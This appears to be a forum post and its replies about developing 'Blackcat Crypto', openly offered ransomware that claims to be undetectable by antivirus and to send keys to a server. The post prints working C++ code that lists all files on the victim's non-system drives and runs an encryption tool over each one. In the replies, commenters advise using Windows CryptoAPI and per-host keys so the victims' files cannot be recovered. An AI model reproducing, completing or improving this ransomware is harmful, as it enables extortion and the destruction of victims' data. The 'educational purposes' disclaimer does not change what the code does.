Ransomware Development V3

** DISCLAIMER: OUR TOOLS ARE FOR EDUCATIONAL PURPOSES ONLY. DON’T USE THEM FOR ILLEGAL ACTIVITIES. YOU ARE THE ONLY RESPONSABLE FOR YOUR ACTIONS! OUR TOOLS ARE OPEN SOURCE WITH NO WARRANTY AND AS ARE.**

logon%20(1)

:sunglasses: Blackcat Crypto

Blackcat Crypto is open source Crypto-Locker. Blackcat Crypto is developed in Visual C++. It has features encrypt all file, lock down the system and send keys back to the server. Multi-threaded functionality helps to this tool make encryption faster.

100% Undetectable by Antivirus Tools.

In This With the help of C++ boost, libraries Get all Files links with Iterative Recursive Call. and AES Crpyt Program uses that files and Encrypt them with command line argument. I Use AesCrypt 64 Bit Console Based Tool. AesCrypt tool(64bit) is 99% Virus Free.

AesCrypt 64Bit
screencapture-virustotal-2019-01-11-21_16_17

Recursive File Encrpter Main Program
screencapture-virustotal-2019-01-11-21_18_48

Step 1: (Fetch files)

Getting all files from all drive to encrypting them.
Here is Visual C++ program get all list directory & files in drive and store path in a text file for encryption later use. I use Boost C++ libraries to get all files list. Please, the first setup Boost libraries to compile the program.

#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>

using namespace std;

fstream out_file("data.txt", ios::out);

#define MAX 256

int main(int argc, char* argv[]) {

	int dr_type = 99;
	char dr_avail[MAX];
	char *temp = dr_avail;

	/* 1st we fill the buffer */
	GetLogicalDriveStrings(MAX, dr_avail);
	while (*temp != NULL) { // Split the buffer by null
		dr_type = GetDriveType(temp);

		char skip[10] = "C:\\";

		if (dr_type == 3 && temp[0] != 'C') {

			boost::system::error_code dir_error;

			for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
				if (dir_error.value()) {
					cerr << "Error accessing file: " << dir_error.message() << endl;
				}
				else {
					cout << dir->path() << endl;
					out_file << dir->path() << "\n";
				}
			}
		}
		temp += lstrlen(temp) + 1;
	}
	out_file.close();
	system("pause");

Step 2 (Encrypt files)

Here firstly I get every file path from “data.txt” line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.

out_file.open("data.txt", ios::in);
	string line;
	while (out_file.good()) {
		getline(out_file, line);
		cout << line << endl;
		std::string cmmd = "crpt.exe -e -p 4321 ";
		cmmd += line;
		system(cmmd.c_str());
	}

Currently in Development

View Project on Github https://github.com/ajayrandhawa/Blackcat-Crypto

If You Like Program Hit :star::star::star::star: on Github

2 Likes

why not use winapi instead of boost ?
and also use winapi or something else to encrypt in your own exe

check out win cryptoapi [msdn cryptoapi]

Boost Libraries use for iterative File Path getting.

you can also do that natively with the winapi
[msdn link]

msdn is your best friend for windows programming :wink:

3 Likes

MSDN great but it does not help me when I list Subfolder with Ittreative scanning, so Boost have less code & More Helpful.

Anyway Thanks, @evil_inside

From the Features listed in the GitHub repository:

  1. Strong AES Encryption. (Unbreakable)

You hardcoded the encryption key in your program, there is no sophisticated way to calculate it during runtime:

std::string cmmd = "crpt.exe -e -p 4321 ";

Serious ransomware have their own ways to calculate a new and unique key for each host they infect, if you leave the code like this it won’t take long for a reverser to find that static key and write a program to recover every file with little effort.

3 Likes

Yes @Baud, I write for this Demo Purpose. Actually, I generate long Key with Random Function. Send Keys on Server Also in Development Phase :slight_smile:

It would be interesting to see the full code then, can you update the GitHub repo to include more functions?

This topic was automatically closed after 30 days. New replies are no longer allowed.